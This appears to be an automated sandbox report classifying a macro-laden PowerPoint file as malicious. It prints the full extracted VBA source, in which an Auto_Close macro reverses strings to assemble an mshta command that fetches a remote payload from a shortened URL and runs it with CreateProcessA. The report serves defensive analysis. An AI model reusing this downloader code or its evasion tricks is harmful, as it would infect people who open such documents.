Verdict: MALICIOUS
Risk Score: 68

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is an OOXML document containing a VBA project with a renamed part, indicating an attempt to evade detection. The presence of an Auto_Close macro suggests that malicious code will execute automatically when the document is closed. The VBA code attempts to use the CreateProcessA API to execute a command line, which is truncated in the provided evidence but strongly implies the execution of a second-stage payload. The Auto_Close macro is a common technique for initial execution after a user opens a malicious document.
Heuristics (3)

- VBA project inside OOXML (medium, OOXML_VBA, 2 related findings): Document contains a VBA project; VBA macros present (project part renamed away from vbaProject.bin: ppt/Woltrine.bin)
- VBA project part renamed to evade filename detection (high, OOXML_VBA_PROJECT_RENAMED): The VBA project is bound through the OOXML relationship/content type, but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script: Attribute VB_Name = "Module2" Sub auto_close()
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3134 bytes |

SHA-256: f352d863ab0e30346b04db3dd4a21a81879f570713dd4486af3409edfded8b80

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module2"
Sub auto_close()
Dim obj1 As New Class1
obj1.CallAzure
End Sub
Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessID As Long
dwThreadID As Long
End Type
Private Declare Function CreateProcessA Lib "kernel32" (ByVal _
lpApplicationName As Long, ByVal lpCommandLine As String, ByVal _
lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, _
ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, _
lpStartupInfo As STARTUPINFO, lpProcessInformation As _
PROCESS_INFORMATION) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal _
hObject As Long) As Long
Private Const NORMAL_PRIORITY_CLASS = &H20&
Private Const INFINITE = -1&
Public Sub MostCalls(cmdline As String)
Dim proc As PROCESS_INFORMATION
Dim start As STARTUPINFO
Dim ReturnValue As Integer
' Initialize the STARTUPINFO structure:
start.cb = Len(start)
' Start the shelled application:
ReturnValue = CreateProcessA _
(0&, _
cmdline$, _
0&, _
0&, _
1&, _
NORMAL_PRIORITY_CLASS, 0&, 0&, start, proc)
' Wait for the shelled application to finish:
End Sub
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public n_name As String
Function CallAzure()
Dim obj As New Class2
getName
obj. _
MostCalls n_name
End Function
Public Function NopsEsAstariksTocCallMoreThanWithin() As String
NopsEsAstariksTocCallMoreThanWithin = StrReverse(" aths")
End Function
Private Function ss(MyVar As Integer)
Dim NopsPubliCMoreThanThat As String
Select Case MyVar
Case 1
NopsPubliCMoreThanThat = "m" + NopsEsAstariksTocCallMoreThanWithin + StrReverse(".www//:ptth") + "bitly.com/asdhjwqdoqiwodma"
Case 2
b_public = "Get Value From Prime Numbers"
Case 3
b_public = "Get No Value as number"
Case Else
MsgBox "Unknown Number"
End Select
n_name = NopsPubliCMoreThanThat
End Function
Private Function getName()
getName = ss(1)
End Function
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: ppt/Woltrine.bin | 28672 bytes |

SHA-256: db7adf055668be9fe8bb702532db5cd5d2768617d3572b60639632f5bf5588b0